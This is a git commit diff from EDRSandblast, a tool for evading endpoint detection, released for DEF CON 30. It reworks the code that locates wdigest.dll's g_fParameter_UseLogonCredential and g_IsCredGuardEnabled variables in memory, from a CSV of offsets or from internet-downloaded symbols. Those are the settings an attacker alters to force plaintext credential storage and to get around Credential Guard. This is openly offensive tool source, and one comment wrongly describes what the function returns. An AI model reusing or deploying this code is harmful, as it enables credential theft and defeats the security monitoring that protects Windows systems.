D3FC0N 30 release: Obj callbacks, firewalling, symbols w/ internet, and more

Co-authored-by: Maxime Meignan <maxime.meignan@wavestone.com>

EDRSandblast/Utils/WdigestOffsets.c

@@ -9,24 +9,25 @@
 #include <tchar.h>
 #include <stdio.h>
 
+#include "../EDRSandblast.h"
 #include "FileVersion.h"
+#include "PdbSymbols.h"
+
 #include "WdigestOffsets.h"
 
-union WdigestOffsets wdigestOffsets = { 0 };
+union WdigestOffsets g_wdigestOffsets = { 0 };
 
 // Return the offsets of nt!PspCreateProcessNotifyRoutine, nt!PspCreateThreadNotifyRoutine, nt!PspLoadImageNotifyRoutine, and nt!_PS_PROTECTION for the specific Windows version in use.
-union WdigestOffsets GetWdigestVersionOffsets(TCHAR* wdigestOffsetFilename) {
-    TCHAR wdigestVersion[256] = { 0 };
-    GetWdigestVersion(wdigestVersion);
-    _tprintf(TEXT("[*] System's wdigest.dll file version is: %s\n"), wdigestVersion);
+void LoadWdigestOffsetsFromFile(TCHAR* wdigestOffsetFilename) {
+    LPTSTR wdigestVersion = GetWdigestVersion();
+    _tprintf_or_not(TEXT("[*] System's wdigest.dll file version is: %s\n"), wdigestVersion);
 
     FILE* offsetFileStream = NULL;
     _tfopen_s(&offsetFileStream, wdigestOffsetFilename, TEXT("r"));
 
-    union WdigestOffsets offsetResults = { 0 };
     if (offsetFileStream == NULL) {
-        _tprintf(TEXT("[!] Offset CSV file not found / invalid. A valid offset file must be specifed!\n"));
-        return offsetResults;
+        _putts_or_not(TEXT("[!] Offset CSV file not found / invalid. A valid offset file must be specifed!"));
+        return;
     }
 
     TCHAR lineWdigestVersion[256];
@@ -37,14 +38,71 @@ union WdigestOffsets GetWdigestVersionOffsets(TCHAR* wdigestOffsetFilename) {
         _tcscpy_s(lineWdigestVersion, _countof(lineWdigestVersion), _tcstok_s(dupline, TEXT(","), &tmpBuffer));
         if (_tcscmp(wdigestVersion, lineWdigestVersion) == 0) {
             TCHAR* endptr;
-            _tprintf(TEXT("[+] Offsets are available for this version of wdigest.dll (%s)!\n"), wdigestVersion);
-            // TODO: switch hardcoded value to sizeof or const defined
-            for (int i = 0; i < 2; i++) {
-                offsetResults.ar[i] = _tcstoull(_tcstok_s(NULL, TEXT(","), &tmpBuffer), &endptr, 16);
+            _tprintf_or_not(TEXT("[+] Offsets are available for this version of wdigest.dll (%s)!\n"), wdigestVersion);
+            for (int i = 0; i < _SUPPORTED_WDIGEST_OFFSETS_END; i++) {
+                g_wdigestOffsets.ar[i] = _tcstoull(_tcstok_s(NULL, TEXT(","), &tmpBuffer), &endptr, 16);
             }
             break;
         }
     }
     fclose(offsetFileStream);
-    return offsetResults;
+}
+
+void SaveWdigestOffsetsToFile(TCHAR* wdigestOffsetFilename) {
+    LPTSTR wdigestVersion = GetWdigestVersion();
+
+    FILE* offsetFileStream = NULL;
+    _tfopen_s(&offsetFileStream, wdigestOffsetFilename, TEXT("a"));
+
+    if (offsetFileStream == NULL) {
+        _putts_or_not(TEXT("[!] Offset CSV file connot be opened"));
+        return;
+    }
+
+    _ftprintf(offsetFileStream, TEXT("%s"), wdigestVersion);
+    for (int i = 0; i < _SUPPORTED_WDIGEST_OFFSETS_END; i++) {
+        _ftprintf(offsetFileStream, TEXT(",%llx"), g_wdigestOffsets.ar[i]);
+    }
+    _fputts(TEXT(""), offsetFileStream);
+
+    fclose(offsetFileStream);
+}
+
+
+void LoadWdigestOffsetsFromInternet(BOOL delete_pdb) {
+    LPTSTR wdigestPath = GetWdigestPath();
+    symbol_ctx* sym_ctx = LoadSymbolsFromImageFile(wdigestPath);
+    if (sym_ctx == NULL) {
+        return;
+    }
+    g_wdigestOffsets.st.g_fParameter_UseLogonCredential = GetSymbolAddress(sym_ctx, "g_fParameter_UseLogonCredential");
+    g_wdigestOffsets.st.g_IsCredGuardEnabled = GetSymbolAddress(sym_ctx, "g_IsCredGuardEnabled");
+    UnloadSymbols(sym_ctx, delete_pdb);
+}
+
+TCHAR g_wdigestPath[MAX_PATH] = { 0 };
+LPTSTR GetWdigestPath() {
+    if (_tcslen(g_wdigestPath) == 0) {
+        // Retrieves the system folder (eg C:\Windows\System32).
+        TCHAR systemDirectory[MAX_PATH] = { 0 };
+        GetSystemDirectory(systemDirectory, _countof(systemDirectory));
+
+        // Compute wdigest.dll path.
+        _tcscat_s(g_wdigestPath, _countof(g_wdigestPath), systemDirectory);
+        _tcscat_s(g_wdigestPath, _countof(g_wdigestPath), TEXT("\\wdigest.dll"));
+    }
+    return g_wdigestPath;
+}
+
+TCHAR g_wdigestVersion[256] = { 0 };
+LPTSTR GetWdigestVersion() {
+    if (_tcslen(g_wdigestVersion) == 0) {
+        LPTSTR wdigestPath = GetWdigestPath();
+
+        TCHAR versionBuffer[256] = { 0 };
+        GetFileVersion(versionBuffer, _countof(versionBuffer), wdigestPath);
+
+        _stprintf_s(g_wdigestVersion, 256, TEXT("wdigest_%s.dll"), versionBuffer);
+    }
+    return g_wdigestVersion;
 }